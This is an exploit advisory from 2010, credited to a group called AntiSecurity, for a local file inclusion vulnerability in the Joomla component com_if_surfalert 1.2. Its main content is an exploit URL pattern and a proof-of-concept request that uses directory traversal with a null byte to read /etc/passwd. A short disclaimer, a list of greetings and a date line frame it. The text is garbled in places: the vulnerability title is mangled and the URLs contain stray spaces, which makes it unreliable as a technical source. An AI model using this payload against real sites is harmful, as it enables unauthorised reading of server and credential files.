Release date: 2010-04-18
Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! ========================================================== ========================================================== ========================================
[O] Joomla Component iF surfALERT Local File compression sion Vulnerability
Software: com_if_surfalert version 1.2.
Vendor: http://www.inertialfate.za.net/
Author: AntiSecurity [NoGe Vrs-hCk OoN_BoY Paman zxvf s4va]
Contact: public [at] antisecurity [dot] org
Home: http://antisecurity.org/
========================================================== ========================================================== ========================================
[O] Exploit
Http: // localhost/[path]/index. php? Option = com_if_surfalert & controller = [LFI]
[O] PoC
Http: // localhost/index. php? Option = com_if_surfalert & controller = .. /.. /.. /.. /.. /.. /.. /.. /.. /.. /etc/passwd % 00
========================================================== ========================================================== ========================================
[O] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill} ^-^ {noname donews wishnusakti
Skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
========================================================== ========================================================== ========================================
[O] April 18 2010-GMT + Jakarta, Indonesia